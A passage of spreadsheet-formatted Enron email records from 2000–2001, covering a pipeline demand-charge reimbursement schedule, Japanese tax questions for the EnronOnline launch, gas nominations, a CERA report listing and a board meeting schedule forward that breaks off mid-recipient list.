_x000D_
The back office is having a hard time dealing with the $11 million dollars _x000D_
that is to be recognized as transport expense by the west desk then recouped _x000D_
from the Office of the Chairman.    Is your understanding that the West desk _x000D_
will receive origination each month based on the schedule below._x000D_
_x000D_
 _x000D_
 The Office of the Chairman agrees to grant origination to the Denver desk as _x000D_
follows:_x000D_
_x000D_
October 2000  $1,395,000_x000D_
November 2000 $1,350,000_x000D_
December 2000 $1,395,000_x000D_
January 2001  $   669,600_x000D_
February 2001  $   604,800_x000D_
March 2001  $   669,600_x000D_
April 2001  $   648,000_x000D_
May 2001  $   669,600_x000D_
June 2001  $   648,000_x000D_
July 2001  $   669,600_x000D_
August 2001  $   669,600_x000D_
September 2001 $   648,000_x000D_
October 2001  $   669,600_x000D_
November 2001 $   648,000_x000D_
December 2001 $   669,600_x000D_
_x000D_
This schedule represents a demand charge payable to NBP Energy Pipelines by _x000D_
the Denver desk.  The demand charge is $.18/MMBtu on 250,000 MMBtu/Day _x000D_
(Oct-00 thru Dec-00) and 120,000 MMBtu/Day (Jan-01 thru Dec-01).  The ENA _x000D_
Office of the Chairman has agreed to reimburse the west desk for this expense._x000D_
_x000D_
Let me know if you disagree._x000D_
_x000D_
Phillip</t>
  </si>
  <si>
    <t>Wed, 6 Sep 2000 01:46:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Thanks for the invitation, but I will be returning from Europe.  Mark</t>
  </si>
  <si>
    <t>Sun, 3 Dec 2000 15:52:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'tedchin@hotmail.com', 'jkelly@fairisaac.com', 'jeff.dasovich@enron.com'})</t>
  </si>
  <si>
    <t>Exhibit A - modified</t>
  </si>
  <si>
    <t>Okay, here it is incorporating Ted's explanation of discount rate - we_x000D_
still need to clear up the CAPM discussion though._x000D_
_x000D_
Cheers_x000D_
 - Exhibit A_assumptions and model.doc_x000D_
_x000D_
Kimberly Kupiecki_x000D_
Director_x000D_
A&amp;R Partners_x000D_
kkupiecki@arpartners.com_x000D_
(650) 762 2800 main_x000D_
(650) 762 2825 direct_x000D_
fax (650) 762 2801</t>
  </si>
  <si>
    <t>Wed, 13 Dec 2000 08:20:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Documents for Coral Units 17 and 18</t>
  </si>
  <si>
    <t xml:space="preserve">These documents do not go to a third party purchaser.  For instance, they do _x000D_
not get the change orders or correspondence relating ot all of  the _x000D_
turbines.  What needs to be pulled together are the technical documents, and _x000D_
any project type correspondence relating to the units being sold._x000D_
_x000D_
Kay_x000D_
_x000D_
_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Rebecca Walker                           12/13/2000 03:48 PM_x000D_
	_x000D_
_x000D_
To: Kay Mann/Corp/Enron@Enron_x000D_
cc:  _x000D_
_x000D_
Subject: Documents for Coral Units 17 and 18_x000D_
_x000D_
Matt Tezyk in EE&amp;CC would like the following information from us in order to _x000D_
help him prepare the documentation on Units 17 and 18 for a third party sale:_x000D_
_x000D_
The free storage letter from GE_x000D_
Any correspondence between GE and Ben or you relating to all 24 turbines_x000D_
Any change orders in addition to #1-4_x000D_
Documentation on any other deals we have made with GE in regards to the LM _x000D_
6000 turbines_x000D_
_x000D_
Ben asked me to follow up on this with you since he does not have copies of _x000D_
the documents._x000D_
_x000D_
Thanks,_x000D_
Rebecca_x000D_
x57968_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 2 Aug 2000 15:05:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>CERA Monthly Summary--July 2000 - CERA Monthly Summary</t>
  </si>
  <si>
    <t xml:space="preserve">**********************************************************************_x000D_
CERA Monthly Summary: Sent Wed, August 02, 2000_x000D_
**********************************************************************_x000D_
_x000D_
Title: CERA Monthly Summary--July 2000_x000D_
Author: CERA_x000D_
E-Mail Category: Monthly Summary_x000D_
Product Line: Monthly Summary ,_x000D_
URL: http://www.cera.com/cfm/track/eprofile.cfm?u=3D5166&amp;m=3D1298 ,_x000D_
_x000D_
Table of Contents_x000D_
_x000D_
ASIA PACIFIC ENERGY_x000D_
After the Panic: East Asia Three Years Later_x000D_
URL: http://www.cera.com/client/ap/pr/070700_10/ap_pr_070700_10_ab.html_x000D_
_x000D_
State Government Finances in India: A Looming Crisis or a Driver for=20_x000D_
Accelerated Energy Sector Reform?_x000D_
URL: http://www.cera.com/client/ap/db/070700_15/ap_db_070700_15_ab.html_x000D_
_x000D_
CERA Insight=01*China's Power Sector: Uneven Recovery, Uneven Reform_x000D_
URL: http://www.cera.com/client/ap/alt/070700_13/ap_alt_070700_13_ab.html_x000D_
_x000D_
CERA Insight: The Second Phase of Deregulation in Japan's Power Industry..._x000D_
URL: http://www.cera.com/client/ap/db/072500_16/ap_db_072500_16_ab.htm_x000D_
_x000D_
_x000D_
CLIMATE CHANGE AND ENVIRONMENT_x000D_
CERA Watch: Moving Toward More Diversified Strategies_x000D_
URL: http://www.cera.com/client/cce/wch/072500_18/cce_wch_072500_18_ab.html_x000D_
_x000D_
_x000D_
ENERGY &amp; e-BUSINESS_x000D_
Retail Energy: Pioneering a Nonenergy Brand in Europe_x000D_
URL: http://www.cera.com/client/e2/alt/071300_15/e2_alt_071300_15_ab.html_x000D_
_x000D_
Disruptive Technology, Industry Structure, and Competitive Advantage_x000D_
URL: http://www.cera.com/client/e2/pr/072000_10/e2_pr_072000_10_ab.html_x000D_
_x000D_
Energy and e-Business: Reflections on the CERA Summit_x000D_
URL: http://www.cera.com/client/e2/db/072800_15/e2_db_072800_15_ab.html_x000D_
_x000D_
_x000D_
EURASIA ENERGY_x000D_
Russia's Governors Could Make or Break Energy Industry Reform_x000D_
URL: http://www.cera.com/client/fsu/db/071000_15/fsu_db_071000_15_ab.html_x000D_
_x000D_
Turkish IPPs Near Approval_x000D_
URL: http://www.cera.com/client/fsu/alt/072100_16/fsu_alt_072100_16_ab.html_x000D_
_x000D_
_x000D_
EUROPEAN GAS_x000D_
Running Fast to Stay Still: Gas Prices in Central Europe_x000D_
URL: http://www.cera.com/client/eg/alt/070300_15/eg_alt_070300_15_ab.html_x000D_
_x000D_
Signposts to a High Demand Path for Natural Gas:..._x000D_
URL: http://www.cera.com/client/eg/alt/070700_11/eg_alt_070700_11_ab.html_x000D_
_x000D_
Retail Energy: Pioneering a Nonenergy Brand in Europe_x000D_
URL: European Gas clients:=20_x000D_
http://www.cera.com/client/eg/alt/071300_15/eg_alt_071300_15_ab.html_x000D_
_x000D_
_x000D_
EUROPEAN POWER_x000D_
First Cracks in "Fortress France": How Long Before the French Market Opens?_x000D_
URL: http://www.cera.com/client/ep/db/071100_10/ep_db_071100_10_ab.html_x000D_
_x000D_
Retail Energy: Pioneering a Nonenergy Brand in Europe_x000D_
URL: http://www.cera.com/client/ep/alt/071300_15/ep_alt_071300_15_ab.html_x000D_
_x000D_
Turkish IPPs Near Approval_x000D_
URL: http://www.cera.com/client/ep/alt/072100_16/ep_alt_072100_16_ab.html_x000D_
_x000D_
FORUM FOR IT STRATEGY_x000D_
White Paper:_x000D_
URL: http://www.cera.com/client/fits/pr/073100_12/fits_pr_073100_12_ab.html_x000D_
_x000D_
Summary of Discussions:_x000D_
URL: http://www.cera.com/client/fits/pr/072800_15/fits_pr_072800_15_ab.html_x000D_
_x000D_
_x000D_
GLOBAL ENERGY_x000D_
Middle East Peacemaking: What Comes Next?_x000D_
URL: http://www.cera.com/client/ge/alt/072600_18/ge_alt_072600_18_ab.html_x000D_
_x000D_
_x000D_
LATIN AMERICA ENERGY_x000D_
Mexico Elections: The PAN Triumvirate_x000D_
URL: http://www.cera.com/client/la/alt/070300_16/la_alt_070300_16_ab.html_x000D_
_x000D_
Brazil Downstream Oil Logistics: Opportunities with Open Access?_x000D_
URL: http://www.cera.com/client/la/db/072500_19/la_db_072500_19_ab.html_x000D_
_x000D_
Argentine Power Markets: June Prices Rise with Increased Demand..._x000D_
URL: http://www.cera.com/client/la/alt/072700_12/la_alt_072700_12_ab.html_x000D_
_x000D_
Coal Bed Methane in Western Canada--A Sleeping Giant?_x000D_
URL: http://www.cera.com/client/nag/db/070600_12/nag_db_070600_12_ab.html_x000D_
_x000D_
_x000D_
NORTH AMERICAN GAS_x000D_
Monthly Briefing: The Pressure Remains_x000D_
URL: http://www.cera.com/client/nag/alt/071400_15/nag_alt_071400_15_ab.html_x000D_
_x000D_
A Quiet Energy Crisis (This Op-Ed article ran in The Washington Post on Jul=_x000D_
y=20_x000D_
21, 2000)_x000D_
URL: http://www.cera.com/client/nag/alt/072600_16/nag_alt_072600_16_ab.html_x000D_
_x000D_
_x000D_
NORTH AMERICAN ELECTRIC POWER_x000D_
A Quiet Energy Crisis (This Op-Ed article ran in The Washington Post on Jul=_x000D_
y=20_x000D_
21, 2000)_x000D_
URL: http://www.cera.com/client/nap/alt/072600_16/nap_alt_072600_16_ab.html_x000D_
_x000D_
_x000D_
REFINED PRODUCTS_x000D_
Monthly Briefing: Refined Products Line=01*North American Markets_x000D_
URL: http://www.cera.com/client/rp/alt/071400_18/rp_alt_071400_18_ab.html_x000D_
_x000D_
Refined Products Line=01*European Markets_x000D_
URL: http://www.cera.com/client/rp/alt/072000_14/rp_alt_072000_14_ab.html_x000D_
_x000D_
Market Update_x000D_
URL: http://www.cera.com/client/rp/alt/072700_17/rp_alt_072700_17_ab.html_x000D_
_x000D_
_x000D_
RETAIL ENERGY FORUM_x000D_
CERA Insight: The Second Phase of Deregulation in Japan's Power Industry..._x000D_
URL: http://www.cera.com/client/ref/db/072500_16/ref_db_072500_16_ab.html_x000D_
_x000D_
Weathering the Summer Price Volatility and Highs--How Will Retail Marketers=_x000D_
=20_x000D_
Fare?_x000D_
URL: http://www.cera.com/client/ref/alt/072700_16/ref_alt_072700_16_ab.html_x000D_
_x000D_
_x000D_
WESTERN ENERGY_x000D_
Power Market Caps: Lower Prices at Higher Risk?_x000D_
URL: http://www.cera.com/client/ce/alt/070700_16/ce_alt_070700_16_ab.html_x000D_
_x000D_
The West: Keeping Its Fingers Crossed_x000D_
URL: http://www.cera.com/client/ce/alt/072600_16/ce_alt_072600_16_ab.html_x000D_
_x000D_
WORLD OIL_x000D_
Oil Market Politics: The Saudi Dilemma_x000D_
URL: http://www.cera.com/client/wo/alt/070600_18/wo_alt_070600_18_ab.html_x000D_
_x000D_
After the Panic: East Asia Three Years Later_x000D_
URL: http://www.cera.com/client/wo/pr/070700_10/wo_pr_070700_10_ab.html_x000D_
_x000D_
OPEC: Arguing over Output_x000D_
URL: http://www.cera.com/client/wo/alt/071800_18/wo_alt_071800_18_ab.html_x000D_
_x000D_
**end**_x000D_
_x000D_
Please follow URL at top of page for a listing of the above reports with=20_x000D_
associated summaries and links to full reports. Note: Should the above URL=_x000D_
=20_x000D_
not work, please use the following URL:=20_x000D_
http://www.cera.com/client/ms_client/index.cfm_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
**********************************************************************_x000D_
Account Changes_x000D_
To edit your personal account information, including your e-mail_x000D_
address, etc. go to: http://eprofile.cera.com/cfm/edit/account.cfm_x000D_
_x000D_
This electronic message and attachments, if any, contain information_x000D_
from Cambridge Energy Research Associates, Inc. (CERA) which is_x000D_
confidential and may be privileged. Unauthorized disclosure, copying,_x000D_
distribution or use of the contents of this message or any attachments,_x000D_
in whole or in part, is strictly prohibited._x000D_
_x000D_
Terms of Use: http://www.cera.com/tos.html_x000D_
Questions/Comments: webmaster@cera.com_x000D_
Copyright 2000. Cambridge Energy Research Associates_x000D_
 </t>
  </si>
  <si>
    <t>Thu, 11 May 2000 11:22:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'becky.tlucek@enron.com', 'tana.jones@enron.com', 'susan.flynn@enron.com', 'carol.clair@enron.com', 'kaye.ellis@enron.com', 'taffy.milligan@enron.com', 'suzanne.adams@enron.com', 'susan.bailey@enron.com', 'mark.taylor@enron.com'})</t>
  </si>
  <si>
    <t>Party for Marie</t>
  </si>
  <si>
    <t>I just learned that I have a conflict on June 2.  So I have already consulted _x000D_
with Marie who has agreed to Friday, June 9.  I hope this works for the _x000D_
majority of the group.  Thanks.  Sara</t>
  </si>
  <si>
    <t>Mon, 1 May 2000 11:45:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Japan, Argentina and Brazil</t>
  </si>
  <si>
    <t xml:space="preserve">I am not aware of any services associated with EnronOnline which the Japanese _x000D_
office might provide which could be the subject of such fees._x000D_
_x000D_
Dave_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Susan Musch@ENRON_DEVELOPMENT_x000D_
05/01/2000 06:17 PM_x000D_
To: Mario Parra Cardoso/Corp/Enron@ENRON_x000D_
cc: Jeff Blumenthal/HOU/ECT@ECT@ENRON, Stephen H Douglas/HOU/ECT@ECT@ENRON, _x000D_
David Forster/Corp/Enron@Enron, Alan Aronowitz@ECT, Mark Taylor@ECT _x000D_
_x000D_
Subject: Re: Japan, Argentina and Brazil  _x000D_
_x000D_
Mario,_x000D_
_x000D_
Yes, we should be ready to go, although the law firm we are using in Japan _x000D_
(Baker &amp; McKenzie in Tokyo) have indicated that they still have a few open _x000D_
issues to follow-up on._x000D_
_x000D_
Baker &amp; McKenzie have concluded that where an Enron non-Tokyo trading office _x000D_
receives a payment on a swap from a Japanese counterparty, that payment _x000D_
should not be subject to Japanese income tax or withholding tax.  Further, _x000D_
they have advised that consumption tax (Japan's 5% VAT) should not apply to _x000D_
financial transactions, although Japanese counterparties acquiring physical _x000D_
product for delivery in Japan would be subject to the 5% consumption tax. _x000D_
_x000D_
Baker &amp; McKenzie have advised that they need to do some follow-up work with _x000D_
respect to payments from options and from physical contracts as well as some _x000D_
further checking on the tax treaties that Japan has with the countries where _x000D_
our non-Japan trading offices are located.  I expect to have their response _x000D_
shortly._x000D_
_x000D_
One issue that we are currently pursuing is the Japanese tax consequences of _x000D_
the Enron Japan trading office providing services that benefit the other _x000D_
Enron trading offices.  In this case, it may be appropriate for Enron Japan _x000D_
to receive a service fee for such services.  I am in the process of _x000D_
determining to what extent Enron Japan would be providing services._x000D_
_x000D_
Please let me know if you have any questions or need any additional _x000D_
information.  I will let you know of any additional developments as soon as _x000D_
they occur._x000D_
_x000D_
Best regards,_x000D_
Susan_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Mario Parra Cardoso@ENRON_x000D_
05/01/2000 02:50 PM_x000D_
To: Susan Musch/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT_x000D_
cc: Jeff Blumenthal/HOU/ECT@ECT, Stephen H Douglas/HOU/ECT@ECT, David _x000D_
Forster/Corp/Enron@Enron _x000D_
_x000D_
Subject: Re: Japan, Argentina and Brazil_x000D_
_x000D_
Susan,_x000D_
_x000D_
Following up on David's email, I understand we are ready to go, right?_x000D_
_x000D_
Mario_x000D_
---------------------- Forwarded by Mario Parra Cardoso/Corp/Enron on _x000D_
05/01/2000 02:39 PM ---------------------------_x000D_
_x000D_
_x000D_
David Forster_x000D_
04/27/2000 06:28 PM_x000D_
To: Susan Musch/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT_x000D_
cc: Mario Parra Cardoso/Corp/Enron@Enron, Jeff Blumenthal/HOU/ECT@ECT, _x000D_
Stephen H Douglas/HOU/ECT@ECT _x000D_
_x000D_
Subject: Re: Japan, Argentina and Brazil  _x000D_
_x000D_
Mario is away until next week._x000D_
_x000D_
The Japanese could trade with any Enron office which is posting commodities _x000D_
on EnronOnline - but are most likely to be interested primarily in the _x000D_
products posted by Singapore (global products), as it provides the best _x000D_
timezone overlap. Both physical and financial are possible, but none of the _x000D_
physical delivery locations on EnronOnline are currently in Japan._x000D_
_x000D_
Dave_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Susan Musch@ENRON_DEVELOPMENT_x000D_
04/27/2000 12:38 PM_x000D_
To: Mario Parra Cardoso/Corp/Enron@ENRON_x000D_
cc: Jeff Blumenthal/HOU/ECT@ECT@ENRON, Stephen H Douglas/HOU/ECT@ECT@ENRON, _x000D_
David Forster/Corp/Enron@Enron _x000D_
_x000D_
Subject: Re: Japan, Argentina and Brazil  _x000D_
_x000D_
Mario,_x000D_
_x000D_
Thanks for your e-mail.  I wanted to follow up on one more point just to make _x000D_
sure we have everything covered for May 1st.  Do we expect the Japanese to do _x000D_
online trading with the other Enron trading offices?  If so, which offices _x000D_
would they be trading with and what kind of products would be traded?  For _x000D_
example, would there be physical settlement (or delivery) of product in Japan _x000D_
to the Japanese customers or would there be only financial derivatives traded?_x000D_
_x000D_
I really appreciate your help on this._x000D_
_x000D_
Best regards,_x000D_
Susan_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Mario Parra Cardoso@ENRON_x000D_
04/27/2000 10:55 AM_x000D_
To: Susan Musch/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT_x000D_
cc: Jeff Blumenthal/HOU/ECT@ECT, Stephen H Douglas/HOU/ECT@ECT, David _x000D_
Forster/Corp/Enron@Enron _x000D_
_x000D_
Subject: Re: Japan, Argentina and Brazil  _x000D_
_x000D_
Susan,_x000D_
_x000D_
Your understanding is correct. _x000D_
_x000D_
Thanks,_x000D_
_x000D_
Mario Parra Cardoso_x000D_
EnronOnline_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Susan Musch@ENRON_DEVELOPMENT_x000D_
04/27/2000 10:46 AM_x000D_
To: Mario Parra Cardoso/Corp/Enron@ENRON_x000D_
cc: Jeff Blumenthal/HOU/ECT@ECT@ENRON, Stephen H Douglas/HOU/ECT@ECT@ENRON _x000D_
_x000D_
Subject: Re: Japan, Argentina and Brazil  _x000D_
_x000D_
I have a conference call set up with our Japanese tax counsel this evening _x000D_
(Thursday evening Houston time).  After the call, I should be able to confirm _x000D_
that there are no major Japanese tax issues once our Japan office commences _x000D_
trading with Japanese counterparties through Enron Online._x000D_
_x000D_
However, I understand that initially, the Japan Online implementation will _x000D_
only entail Japanese counterparties trading internationally (e.g. trading _x000D_
non-Japanese products).  Based on this assumption, I think we're okay for _x000D_
Monday from a Japanese trading office perspective.  Please let me know if my _x000D_
understanding is incorrect._x000D_
_x000D_
Best regards,_x000D_
Susan_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Mario Parra Cardoso@ENRON_x000D_
04/26/2000 03:34 PM_x000D_
To: Jeff Blumenthal/HOU/ECT@ECT_x000D_
cc: Susan Musch/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Stephen H _x000D_
Douglas/HOU/ECT@ECT _x000D_
_x000D_
Subject: Re: Japan, Argentina and Brazil_x000D_
_x000D_
Jeff,_x000D_
_x000D_
The marketing material is on its way to Tokyo. This Friday it is expected to _x000D_
be sent to clients. _x000D_
_x000D_
As you can see, time is something that we don't have. Could you please let us _x000D_
know if we are OK to go with the Japanese launch?_x000D_
_x000D_
Thanks,_x000D_
_x000D_
Mario_x000D_
_x000D_
---------------------- Forwarded by Mario Parra Cardoso/Corp/Enron on _x000D_
04/26/2000 03:27 PM ---------------------------_x000D_
_x000D_
_x000D_
Mario Parra Cardoso_x000D_
04/19/2000 03:30 PM_x000D_
To: Jeff Blumenthal/HOU/ECT@ECT_x000D_
cc: Susan Musch/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT@ECT, Stephen H _x000D_
Douglas/HOU/ECT@ECT _x000D_
_x000D_
Subject: Re: Japan, Argentina and Brazil  _x000D_
_x000D_
Jeff,_x000D_
_x000D_
You are right. For the launch of EnronOnline in Japan, local clients will be _x000D_
offered the ability to trade existing EOL products. Japanese products will be _x000D_
offered in  the future. _x000D_
_x000D_
Please be advised, though, that Singapore products are likely to be added to _x000D_
EnronOnline before the Japanese launch. We expect Japanese clients to trade _x000D_
Singapore products, in addition to the ones currently available._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Mario_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Jeff Blumenthal@ECT_x000D_
04/19/2000 03:18 PM_x000D_
To: Mario Parra Cardoso/Corp/Enron@ENRON_x000D_
cc: Susan Musch/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Stephen H _x000D_
Douglas/HOU/ECT@ECT _x000D_
_x000D_
Subject: Re: Japan, Argentina and Brazil  _x000D_
_x000D_
Mario,_x000D_
_x000D_
We have begun discussions with a Tokyo law firm regarding the various _x000D_
Japanese tax issues related to EnronOnLine.  In that vein, can you please _x000D_
clarify whether ENA will be offering certain Japanese counterparties the _x000D_
ability to trade existing EOL products (i.e., products that are not _x000D_
Japanese-based) and that such offering will commence in May, 2000, while no _x000D_
Japanese products will be offered until sometime in the future? _x000D_
_x000D_
If you would, please reply to all listed above so that we can hold _x000D_
discussions this evening with out Japanese tax advisors._x000D_
_x000D_
Thanks for your help, and best regards,_x000D_
_x000D_
Jeff_x000D_
_x000D_
_x000D_
_x000D_
Mario Parra Cardoso@ENRON_x000D_
04/19/2000 10:12 AM_x000D_
To: Jeff Blumenthal/HOU/ECT@ECT_x000D_
cc: Stephen H Douglas/HOU/ECT@ECT _x000D_
Subject: Re: Japan, Argentina and Brazil  _x000D_
_x000D_
Jeff,_x000D_
_x000D_
Japan is obviously the country that worries me the most since we intend to _x000D_
launch the site for Japanese clients in May. _x000D_
_x000D_
The marketing material is expected to be sent by late next week._x000D_
_x000D_
Please let me know how long the process for Japan may still last and if you _x000D_
anticipate problems._x000D_
_x000D_
Brazil and Argentina are expected be launched this summer._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Mario_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Jeff Blumenthal@ECT_x000D_
04/19/2000 09:34 AM_x000D_
To: Mario Parra Cardoso/Corp/Enron@ENRON_x000D_
cc: Stephen H Douglas/HOU/ECT@ECT _x000D_
_x000D_
Subject: Re: Japan, Argentina and Brazil  _x000D_
_x000D_
Mario,_x000D_
_x000D_
We've begun working with our outside tax advisors.  I understand the urgency _x000D_
of this matter and will see that it is moved along as quickly as possible.  _x000D_
In the meantime, please let me know if you have any questions.  Thanks._x000D_
_x000D_
_x000D_
_x000D_
Mario Parra Cardoso@ENRON_x000D_
04/17/2000 04:07 PM_x000D_
To: Jeff Blumenthal/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Japan, Argentina and Brazil_x000D_
_x000D_
Jeff,_x000D_
_x000D_
Anything new on tax issues related to EnronOnline for the countries above _x000D_
mentioned?_x000D_
_x000D_
Thanks,_x000D_
_x000D_
Mario_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 20 Apr 2000 02:43:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'hboyd@columbiaenergygroup.com'})</t>
  </si>
  <si>
    <t>Re: CPA 4/21</t>
  </si>
  <si>
    <t xml:space="preserve">k38021 was=6013 now=3393_x000D_
_x000D_
_x000D_
thanks_x000D_
joann_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
hboyd@columbiaenergygroup.com on 04/20/2000 09:17:20 AM_x000D_
To: " - *Robert.Allwein@enron.com" &lt;Robert.Allwein@enron.com&gt;, " - _x000D_
*Joan.Veselack@enron.com" &lt;Joan.Veselack@enron.com&gt;, " - _x000D_
*Joann.Collins@enron.com" &lt;Joann.Collins@enron.com&gt;_x000D_
cc: " - *Kinney, Doug" &lt;dkinney@columbiaenergygroup.com&gt; _x000D_
_x000D_
Subject: CPA 4/21_x000D_
_x000D_
_x000D_
Howdy Folks!!_x000D_
_x000D_
Hey Joann,_x000D_
_x000D_
Can you please decrease my nomination to CPA 4-25 starting 4/21?_x000D_
_x000D_
I am looking to decrease my CES endusers volume by 2,620 dth/day from 4/21 to_x000D_
4/30 in Op4 Mkt 25.  I am not interested in sending it elsewhere so it will_x000D_
have to be a sell back.  This will appear in Doug Kinney's next spreadsheet._x000D_
_x000D_
Please just let me know which contracts to decrease (38021???)  : )_x000D_
_x000D_
THANKS!!!_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 5 Oct 2000 09:22:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Duke Cashout Entries 5/00 and 6/00</t>
  </si>
  <si>
    <t xml:space="preserve">I fixed it._x000D_
_x000D_
_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Megan Parker @ ENRON                           10/05/2000 03:28 PM_x000D_
	_x000D_
_x000D_
To: Daren J Farmer/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: Duke Cashout Entries 5/00 and 6/00  _x000D_
_x000D_
I am having trouble pulling in the demand charge for 6/00 on deal 157278 for _x000D_
$1,129.09.  The only thing that is different from May is that the demand _x000D_
volume is 0.  I think it needs to be a 1 for the charge to come through.  _x000D_
Please take a look._x000D_
_x000D_
Thanks,_x000D_
Megan_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Sun, 28 Jan 2001 03:23:00 -0800 (PST)</t>
  </si>
  <si>
    <t>ENE Committee and Board Meeting Schedule - 2001</t>
  </si>
  <si>
    <t xml:space="preserve">calendar_x000D_
----- Forwarded by Steven J Kean/NA/Enron on 01/28/2001 11:23 AM -----_x000D_
_x000D_
	Rebecca Carter_x000D_
	Sent by: Kelly Johnson_x000D_
	01/24/2001 03:54 PM_x000D_
		 _x000D_
		 To: James M Bannantine/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Cliff _x000D_
Baxter/HOU/ECT@ECT, Sanjay Bhatnagar/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, _x000D_
Rick Buy/HOU/ECT@ECT, Richard Causey/Corp/Enron@ENRON, Diomedes _x000D_
Christodoulou/SA/Enron@Enron, David W Delainey/HOU/ECT@ECT, James _x000D_
Derrick/Corp/Enron@ENRON, Andrew S Fastow/HOU/ECT@ECT, peggy_fowler@pgn.com, _x000D_
Mark Frevert/NA/Enron@Enron, Ben F Glisan/HOU/ECT@ECT, Kevin Hannon/Enron _x000D_
Communications@Enron Communications, David _x000D_
Haug/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Stanley Horton/Corp/Enron@Enron, _x000D_
Larry L Izzo/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Steven J _x000D_
Kean/NA/Enron@Enron, Mark Koenig/Corp/Enron@ENRON, Mike _x000D_
McConnell/HOU/ECT@ECT, Rebecca McDonald/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, _x000D_
Jeffrey McMahon/Enron@EnronXGate, Mark Metts/NA/Enron@Enron, Cindy _x000D_
Olson/Corp/Enron@ENRON, Karen S Owens@ees@EES, Ken Rice/Enron _x000D_
Communications@Enron Communications, Jeffrey Sherrick/Corp/Enron@ENRON, John _x000D_
Sherriff/LON/ECT@ECT, Jeff Skilling/Corp/Enron@ENRON, Greg _x000D_
Whalley/HOU/ECT@ECT, Thomas E White/HOU/EES@EES, Philippe A Bibi/HOU/ECT@ECT, _x000D_
Raymond Bowen/HOU/ECT@ECT, Michael R Brown/LON/ECT@ECT, Wade _x000D_
Cline/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, James A _x000D_
Hughes/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, John J Lavorato/Corp/Enron@Enron, _x000D_
Jeffrey A Shankman/HOU/ECT@ECT, Jeremy Blachman/HOU/EES@EES, Harold G _x000D_
Buchanan/HOU/EES@EES, Dan Leff/HOU/EES@EES, Mark S Muller/HOU/EES@EES, _x000D_
Matthew Scrimshaw/LON/ECT@ECT, Marty Sunde/HOU/EES@EES, David Cox/Enron _x000D_
Communications@Enron Communications, Steve Elliott/Enron Communications@Enron _x000D_
Communications, Jim Fallon/Enron Communications@Enron Communications, Rod _x000D_
Hayslett/FGT/Enron@ENRON, Danny McCarty/ET&amp;S/Enron@Enron_x000D_
		 cc: Rex Rogers/Corp/Enron@Enron, Terry West/Corp/Enron@ENRON, Jim _x000D_
Armogida/Corp/Enron@ENRON, Mary Joyce/HR/Corp/Enron@ENRON, Pam _x000D_
Butler/HR/Corp/Enron@ENRON, Stephanie McGinnis/HOU/ECT@ECT, Sharon E _x000D_
Sullo/HOU/ECT@ECT, Brenda Castillo/NA/Enron@Enron, Marcia _x000D_
Manarin/SA/Enron@Enron, Susan Skarness/HOU/ECT@ECT, Stacy _x000D_
Guidroz/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Beena _x000D_
Pradhan/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Karen K Heathman/HOU/ECT@ECT, _x000D_
Sharron Westbrook/Corp/Enron@ENRON, Molly Bobrow/NA/Enron@Enron, Kay _x000D_
Chapman/HOU/ECT@ECT, Stephanie Harris/Corp/Enron@ENRON, Bridget _x000D_
Maronge/HOU/ECT@ECT, mary_trosper@pgn.com, Nicki Daw/NA/Enron@Enron, Carol _x000D_
Ann Brown/Enron Communications@Enron Communications, Elaine _x000D_
Rodriguez/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Cindy Stark/Corp/Enron@ENRON, _x000D_
Mary E Garza/ENRON_DEVELOPMENT@Enron_Development, Maureen _x000D_
McVicker/NA/Enron@Enron, Joannie Williamson/Corp/Enron@ENRON, Cathy _x000D_
Phillips/HOU/ECT@ECT, Loretta Brelsford/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, _x000D_
Sue Ford/Enron@EnronXGate, Dolores Fisher/NA/Enron@Enron, Kathy _x000D_
McMahon/NA/Enron@Enron, Karen Owens/HOU/EES@EES, Dorothy Dalton/Enron _x000D_
